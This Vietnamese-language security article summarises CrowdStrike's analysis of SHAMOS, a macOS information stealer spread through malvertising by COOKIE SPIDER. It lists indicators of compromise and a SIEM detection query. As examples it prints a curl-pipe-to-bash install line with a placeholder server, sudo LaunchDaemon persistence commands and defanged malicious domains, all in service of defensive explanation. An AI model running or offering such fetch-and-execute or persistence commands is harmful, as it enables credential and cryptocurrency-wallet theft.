Các nhà nghiên cứu an ninh mạng tại CrowdStrike đã phát hiện và ngăn chặn một chiến dịch mã độc tinh vi, triển khai SHAMOS malware, một biến thể nâng cao của mã độc đánh cắp thông tin Atomic macOS Stealer (AMOS). Chiến dịch này được thực hiện bởi nhóm tội phạm mạng COOKIE SPIDER. Hoạt động theo mô hình Malware-as-a-Service (MaaS), COOKIE SPIDER cho thuê công cụ đánh cắp thông tin này cho các nhóm liên kết để nhắm mục tiêu vào nạn nhân. Mục tiêu chính là thu thập dữ liệu nhạy cảm, bao gồm thông tin đăng nhập, ví tiền điện tử, và các dữ liệu cá nhân khác.

Tổng Quan Chiến Dịch và Mục Tiêu

Chiến dịch này đã cố gắng xâm nhập hơn 300 môi trường khách hàng. Tuy nhiên, nó đã bị nền tảng CrowdStrike Falcon chặn thành công. Điều này nhấn mạnh mối đe dọa mạng ngày càng tăng từ các mã độc chuyên biệt cho macOS trong hệ sinh thái tội phạm mạng (eCrime).

Các nạn nhân đến từ nhiều quốc gia như Hoa Kỳ, Vương quốc Anh, Nhật Bản, Trung Quốc, Colombia, Canada, Mexico và Ý đã bị nhắm mục tiêu. Đáng chú ý, Nga và các quốc gia thuộc Cộng đồng các Quốc gia Độc lập đã bị loại trừ. Điều này phù hợp với các quy định trong các diễn đàn eCrime của Nga cấm tấn công người dùng trong nước.

Chiến Thuật Lan Truyền: Malvertising

Chiến dịch này dựa vào chiến thuật malvertising (quảng cáo độc hại). Các trang web trợ giúp macOS giả mạo được quảng bá trong kết quả tìm kiếm. Chúng lôi kéo người dùng đang tìm kiếm giải pháp cho các vấn đề phổ biến, ví dụ như xóa bộ nhớ cache của trình phân giải.

Malvertising đã hướng người dùng đến các trang web giả mạo, bắt chước các trang hỗ trợ macOS hợp pháp, chẳng hạn như mac-safer[.]com và rescue-mac[.]com. Các trang này cung cấp hướng dẫn sai lệch để thực thi một lệnh cài đặt một dòng độc hại trong Terminal.

Kỹ Thuật Xâm Nhập và Khai Thác SHAMOS

Cơ Chế Khai Thác Ban Đầu

Lệnh một dòng này, thường được mã hóa Base64, đã tải xuống một script Bash. Script này có chức năng thu thập mật khẩu của người dùng và tải về tệp thực thi Mach-O của SHAMOS malware. Bằng cách khai thác kỹ thuật này, kẻ tấn công đã bỏ qua các kiểm tra bảo mật của macOS Gatekeeper. Điều này cho phép cài đặt trực tiếp mã độc mà không kích hoạt các biện pháp bảo vệ tiêu chuẩn.

Ví dụ về lệnh được quan sát:

curl -sL [địa_chỉ_server]/payload.sh | bash

Hành Vi của SHAMOS Malware

Khi thực thi, SHAMOS malware được tải xuống thư mục /tmp/. Tại đây, nó loại bỏ các thuộc tính tệp mở rộng bằng lệnh xattr để trốn tránh phát hiện, gán quyền thực thi thông qua chmod và chạy các kiểm tra chống máy ảo (anti-VM) để tránh môi trường sandbox.

Sau đó, nó sử dụng AppleScript để thực hiện do thám, quét các tệp ví tiền điện tử, dữ liệu Keychain, Apple Notes và thông tin đăng nhập trình duyệt. Dữ liệu thu thập được sẽ được nén vào một tệp ZIP có tên out.zip và được xuất qua các lệnh curl tới các máy chủ do kẻ tấn công kiểm soát.

Các payload tiếp theo, bao gồm một ứng dụng ví Ledger Live giả mạo và một mô-đun botnet, được triển khai dưới dạng các tệp ẩn trong thư mục chính của người dùng.

Cơ Chế Duy Trì Quyền Truy Cập (Persistence)

Nếu có quyền sudo, SHAMOS malware sẽ thiết lập khả năng duy trì bằng cách tạo một tệp Plist (com.finder.helper.plist) trong thư mục LaunchDaemons. Điều này đảm bảo quyền truy cập lâu dài cho kẻ tấn công.

sudo cp /tmp/com.finder.helper.plist /Library/LaunchDaemons/com.finder.helper.plist
sudo launchctl load /Library/LaunchDaemons/com.finder.helper.plist

Các quan sát của CrowdStrike ghi nhận nhiều lệnh gọi curl cho thấy hoạt động của botnet, nhấn mạnh thiết kế mô-đun của mã độc này để kéo dài sự xâm nhập. Xem thêm chi tiết tại CrowdStrike Blog.

Chỉ Số Thỏa Hiệp (IOCs)

Các chỉ số thỏa hiệp liên quan đến chiến dịch SHAMOS malware bao gồm:

• Tên miền độc hại (Malicious Domains):
  • mac-safer[.]com
  • rescue-mac[.]com
  • macostutorial[.]com
• Tên tệp và đường dẫn:
  • /tmp/SHAMOS_executable
  • /tmp/out.zip
  • /Library/LaunchDaemons/com.finder.helper.plist
• Hành vi CLI/Kịch bản:
  • Thực thi Bash script từ URL bên ngoài.
  • Sử dụng lệnh xattr -c để xóa thuộc tính mở rộng.
  • Sử dụng lệnh chmod +x để gán quyền thực thi.
  • Sử dụng curl để tải xuống và xuất dữ liệu.
  • Sử dụng AppleScript để do thám hệ thống.
  • Tạo tệp Plist để duy trì quyền truy cập.

Các Chiến Dịch Tương Tự và Xu Hướng

Các chiến thuật tương tự đã được quan sát trong các chiến dịch trước đây liên quan đến Cuckoo Stealer và các biến thể SHAMOS malware, bao gồm malvertising cho Homebrew từ tháng 5 năm 2024 đến tháng 1 năm 2025. Ngoài ra, các kho lưu trữ GitHub mạo danh các công cụ macOS miễn phí như trình chỉnh sửa video, phần mềm CAD và ứng dụng AI cũng được sử dụng.

Các báo cáo mã nguồn mở đã xác nhận những phát hiện này, chi tiết về một chiến dịch liên quan thông qua một kho lưu trữ GitHub giả mạo iTerm2, một trình giả lập terminal macOS phổ biến. Kho lưu trữ này hướng dẫn người dùng chạy một lệnh một dòng tương tự, tải SHAMOS malware từ các tên miền như macostutorial[.]com. Điều này cho thấy sự ưa thích của các tác nhân trong việc kết hợp kỹ thuật xã hội với kỹ thuật né tránh.

CrowdStrike đánh giá với độ tin cậy cao rằng các tác nhân eCrime sẽ kiên trì sử dụng malvertising và các lệnh cài đặt một dòng để phân phối mã độc đánh cắp thông tin trên macOS. Điều này dựa trên hiệu quả đã được chứng minh của chúng trong việc bỏ qua Gatekeeper và thu hút lưu lượng nạn nhân.

Biện Pháp Phòng Chống và Phát Hiện Bảo Mật Mạng

Nền tảng Falcon của CrowdStrike với khả năng học máy và chỉ số tấn công (IOAs) cung cấp khả năng phát hiện đa lớp, ngăn chặn SHAMOS malware ở các giai đoạn tải xuống, thực thi và xuất dữ liệu.

Để bảo vệ hệ thống, người dùng nên kích hoạt tính năng ngăn chặn tiến trình đáng ngờ (suspicious process prevention) và ngăn chặn mối đe dọa từ thông tin tình báo (intelligence-sourced threat prevention) trong các chính sách Falcon Insight XDR.

Các nhà săn lùng mối đe dọa có thể sử dụng các truy vấn Falcon Next-Gen SIEM để phát hiện các hành vi rủi ro, chẳng hạn như các script Bash gọi dscl, curl, xattr và chmod, hoặc các thực thi AppleScript từ các tệp nhị phân trong thư mục /tmp/.

# Ví dụ truy vấn SIEM để phát hiện hành vi đáng ngờ
Event_SimpleName=ProcessRollup2
FileName IN ("bash", "zsh", "sh")
CommandLine CONTAINS "curl" AND CommandLine CONTAINS "| bash"
| OR
FileName="xattr" AND CommandLine CONTAINS "-c"
| OR
FileName="chmod" AND CommandLine CONTAINS "+x"
| OR
ParentFileName IN ("bash", "zsh", "sh", "osascript") AND FileName IN ("dscl", "curl", "xattr", "chmod")
| OR
ParentFileName="osascript" AND CommandLine CONTAINS "/tmp/" AND CommandLine ENDS WITH ".app"